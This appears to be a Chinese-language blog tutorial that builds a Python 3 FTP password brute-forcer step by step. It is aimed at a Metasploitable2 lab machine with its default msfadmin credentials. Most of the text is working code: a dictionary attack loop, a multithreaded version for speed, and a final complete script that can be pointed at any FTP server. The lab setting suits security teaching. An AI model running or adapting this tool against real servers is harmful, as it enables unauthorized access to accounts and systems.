python3之编写ftp爆破

python3之编写ftp爆破

这里开启metasploitable2，上面默认开启FTP服务，账号密码为msfadmin：msfadmin。下面先实现FTP登录的功能：

import ftplib
def login_ftp(host):
    user = input('FTP账号：')
    password = input('FTP密码：')
    try:
        ftp = ftplib.FTP(host)
        ftp.login(user,password)
        print('FTP login successful!')
        ftp.quit()
        return True
    except:
        print('FTP login fail!')
        return False

def main():
    host = '192.168.0.176'   #metasploitable的IP地址
    login_ftp(host)

if __name__ == '__main__':
    main()

我们看一下登录成功和失败的结果：

接下来加入字典爆破的功能，代码如下：

import ftplib
def brute_ftp(host,pass_dict):
    user = 'msfadmin'
    with open(pass_dict,'r') as f:
        for line in f:
            password = line.strip('\r').strip('\n')
            print('Try password: ', password)
            try:
                ftp = ftplib.FTP(host)
                ftp.login(user,password)
                print('FTP login \033[1;32;40msuccessful\033[0m!')
                ftp.quit()
                return True
            except:

                print('FTP login \033[1;31;40mfail\033[0m!')
                # return False

def main():
    host = '192.168.0.176'   #metasploitable的IP地址
    pass_dict = input('输入密码字典路径：')
    brute_ftp(host,pass_dict)

if __name__ == '__main__':
    main()

爆破效果如下：

当然此时的爆破速度不是很快，我们可以加入多线程来提高爆破速度：

=========================      2017.5.25更新   =========================

多线程代码如下：

import ftplib
import queue
import threading
class thread_Brute_Ftp(threading.Thread):
    def __init__(self,q):
        threading.Thread.__init__(self)
        self._q = q

    def run(self):
        user = 'msfadmin'
        host = '192.168.0.178'
        while not self._q.empty():
            password = self._q.get()
            print('Try password:',password)
            try:
                ftp = ftplib.FTP('192.168.0.178')
                ftp.login(user,password)
                print('FTP login \033[1;32;40msuccessful\033[0m!')
                print('FTP password is \033[1;32;40m%s\033[0m ' % password)
                ftp.quit()

                return
            except:
                pass
                # print('FTP login \033[1;31;40mfail\033[0m!')

def brute_ftp(pass_dict):
    threads = []
    q = queue.Queue()
    with open(pass_dict,'r') as f:                  #把字典存入队列
        for line in f:
            password = line.strip('\r').strip('\n')
            q.put(password)
    thread_count = int(input('线程数：'))
    for i in range(thread_count):
        threads.append(thread_Brute_Ftp(q))
    for i in threads:
        i.start()
    for i in threads:
        i.join()

def main():
    pass_dict = input('输入密码字典路径：')
    brute_ftp(pass_dict)

if __name__ == '__main__':
    main()

效果图如下：

但是如果想像之前那样输出打印结果，却会乱序。如下：

后来我将输出语句做如下调整：

效果图如下：

完整代码如下：

import ftplib
import queue
import time
import threading
class thread_Brute_Ftp(threading.Thread):
    def __init__(self,q):
        threading.Thread.__init__(self)
        self._q = q

    def run(self):
        user = 'msfadmin'
        host = '192.168.0.178'
        while not self._q.empty():
            password = self._q.get()
            try:
                ftp = ftplib.FTP('192.168.0.178')
                ftp.login(user,password)
                print('Try password:', password)
                print('FTP login \033[1;32;40msuccessful\033[0m!')
                # print('FTP password is \033[1;32;40m%s\033[0m ' % password)
                ftp.quit()
                return
            except:
                print('Try password:', password)
                print('FTP login \033[1;31;40mfail\033[0m!')

def brute_ftp(pass_dict):
    threads = []
    q = queue.Queue()
    with open(pass_dict,'r') as f:                  #把字典存入队列
        for line in f:
            password = line.strip('\r').strip('\n')
            q.put(password)
    thread_count = int(input('线程数：'))
    for i in range(thread_count):
        threads.append(thread_Brute_Ftp(q))
    for i in threads:
        i.start()
    for i in threads:
        i.join()

def main():
    time_start = time.time()
    pass_dict = input('输入密码字典路径：')
    brute_ftp(pass_dict)
    print(time.time()-time_start)

if __name__ == '__main__':
    main()